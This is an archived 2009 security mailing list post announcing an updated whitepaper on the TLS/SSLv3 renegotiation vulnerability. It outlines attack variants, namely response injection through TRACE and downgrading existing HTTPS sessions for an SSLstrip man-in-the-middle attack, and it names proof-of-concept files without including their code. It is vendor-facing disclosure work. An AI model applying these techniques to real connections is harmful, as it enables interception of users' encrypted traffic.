lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 30 Nov 2009 15:15:42 +0100
From: Thierry Zoller <>
To: bugtraq <>,
	full-disclosure <>,
	<>, <>, <>,
Subject: TLS / SSLv3 vulnerability explained  (New ways to leverage the vulnerability)

Dear List,

I  updated  the  whitepaper  with  a  lot  of  new  information,  some
leveraging  the  vulnerability  in  other  ways  that certainly increase
the effectiveness and impact of this vulnerability.

A brief warning to those that think they are safe because they
don't   accept   client-side   renegotiations   (server  + openssl). I
came across major websites where the SSL loadbalancer in front of the HTTPS
servers were vulnerable. Although the servers were patched it still was
possible   to  perform  the  attacks  (The  loadbalancer  merged  both
sessions and handed them as one to the webserver)

Updates :
- Added a simple s_client testcase
- Analysis of FTPS (vendors are encouraged to assess)
- HTTPS : Injecting arbritary _responses_ into the stream
- HTTPS : Downgrading HTTPS to HTTP and performing an active mitm
          (Discovered by Frank Heidt but details witheld,
          rediscovered by Thierry Zoller for this paper)

With this new information G-SEC encourages Vendors  and  customers
to reevaluate the impact of this vulnerability on their products.

Brief explanations :
HTTPS : Injecting arbritary _responses_ into the stream
The  attacker  injects  a  TRACE command, by doing so the attacker can
indirectly control the content that is send from the server to the
victim over HTTPS

Downgrading HTTPS to HTTP and performing an active mitm
This  attack  leverages  the  known  SSLStrip  attack  to also work on
establised  SSL  connections.  SSLstrip  had  the  limitation  that it
required a user to access over HTTP in order to rewrite the html code
to  perform  active  mitm.  This  attack  over  the  TLS renegotiation
vulnerability now allows (if certain conditions are met) to downgrade
EXISTING SSL connections to perform an SSLstrip attack.

Proof of concept files
G-SEC provides 2 proof of concept files  :
- ssl-trace.c : using TRACE to inject (partialy) arbritary content
                into the encrypted stream
- ssl-302.c : Injecting a GET command to a 302 page redirecting the
              client to HTTP

Whitepaper :
POC files :


This paper explains the vulnerability for a broader audience and
summarizes the information that is currently available. The document
is prone to updates and is believed to be accurate by the time of


Direct Download

Information is believed to be accurate by the time of writing.
As this vulnerability has complex implications this document
is prone to revisions in the future.

Thierry ZOLLER - G-SEC
Principal Security Consultant

Powered by blists - more mailing lists